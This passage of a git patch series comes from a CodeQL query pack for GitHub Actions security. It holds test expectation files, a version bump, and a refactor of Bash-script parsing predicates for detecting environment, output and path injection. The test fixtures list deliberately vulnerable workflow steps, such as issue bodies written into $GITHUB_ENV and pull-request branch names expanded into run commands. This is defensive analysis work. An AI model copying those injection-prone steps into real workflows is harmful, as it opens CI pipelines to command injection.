.github/workflows/multiline2.yml:34:9:40:6 | Run Step | tee -a $GITHUB_ENV << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tee -a $GITHUB_ENV | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | diff --git a/ql/test/library-tests/commands.ql b/ql/test/library-tests/commands.ql new file mode 100644 index 000000000000..a13608145cfd --- /dev/null +++ b/ql/test/library-tests/commands.ql @@ -0,0 +1,4 @@ +import actions + +from Run run +select run, run.getACommand() diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 0cd71f96ea91..100eddb14002 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,6 +1,4 @@ -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | From 68da4823529d4084cb953d7a3950f4d05555af14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:36:49 +0200 Subject: [PATCH 563/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index af477fb9bf71..9637b9931187 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.61 +version: 0.1.62 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b8b9ef321c2..6548292a6772 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.61 +version: 0.1.62 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7d2cbc1f50bd1121a0a0ec88ec955d8b35a9f708 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:13:27 +0200 Subject: [PATCH 564/707] Improve Bash script parser --- ql/lib/codeql/actions/Ast.qll | 18 + ql/lib/codeql/actions/Helper.qll | 500 ++++++++---------- ql/lib/codeql/actions/ast/internal/Ast.qll | 194 ++++++- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 58 +- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 11 +- .../security/OutputClobberingQuery.qll | 34 +- .../actions/security/PoisonableSteps.qll | 9 +- ql/test/library-tests/commands.expected | 32 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.ql | 12 +- 11 files changed, 488 insertions(+), 390 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a4c50ecf55b6..759bcf3f786a 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -294,9 +294,27 @@ class Run extends Step instanceof RunImpl { string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getStmt(int i) { result = super.getStmt(i) } + + string getAStmt() { result = super.getAStmt() } + + string getCommand(int i) { result = super.getCommand(i) } + string getACommand() { result = super.getACommand() } + predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + + predicate getAWriteToGitHubEnv(string name, string value) { + super.getAWriteToGitHubEnv(name, value) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + super.getAWriteToGitHubOutput(name, value) + } + + predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index d6e3042ead36..8391463fd202 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -24,219 +24,6 @@ string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -/** Checks if expr is a bash parameter expansion */ -bindingset[expr] -predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) -} - -bindingset[raw_content] -predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) -} - -bindingset[script] -predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) -} - -bindingset[script] -predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) -} - -bindingset[script] -predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) -} - -bindingset[script] -predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content - //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) -} - -bindingset[script] -predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) -} - -bindingset[script] -predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) -} - -bindingset[script, file_var] -predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) -} - -predicate writeToGitHubEnv(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_ENV", content) -} - -predicate writeToGitHubOutput(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) -} - -predicate writeToGitHubPath(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_PATH", content) -} - -/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ -bindingset[script, file_var] -predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) -} - -predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) -} - -predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) -} - -predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) -} - predicate inPrivilegedContext(AstNode node, Event event) { node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } @@ -245,16 +32,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -bindingset[snippet] -predicate outputsPartialFileContent(string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 -} - string defaultBranchNames() { repositoryDataModel(_, result) or @@ -321,80 +98,225 @@ module Bash { string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + + // "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + + // ")\n" + + "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + bindingset[script] - string getACommand(string script) { - exists(string stmt_, string stmt, string subline2, string cmd | - stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and - stmt = - [ - // $() command substitution - stmt_ - 